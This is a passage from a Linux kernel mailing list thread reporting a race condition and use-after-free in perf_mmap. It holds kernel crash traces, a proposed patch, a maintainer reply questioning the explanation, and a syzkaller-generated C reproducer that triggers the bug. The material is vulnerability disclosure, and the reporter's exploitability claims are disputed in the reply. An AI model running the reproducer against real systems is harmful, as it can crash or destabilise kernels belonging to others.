bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
On Mon, Feb 02, 2026 at 02:58:59PM +0100, Peter Zijlstra wrote: I'm not seeing it; once perf_mmap_rb() completes, we should have event->mmap_count != 0, and this the IOC_SET_OUTPUT will fail. Please provide a better explanation.
{ "author": "Peter Zijlstra <peterz@infradead.org>", "date": "Mon, 2 Feb 2026 15:36:15 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 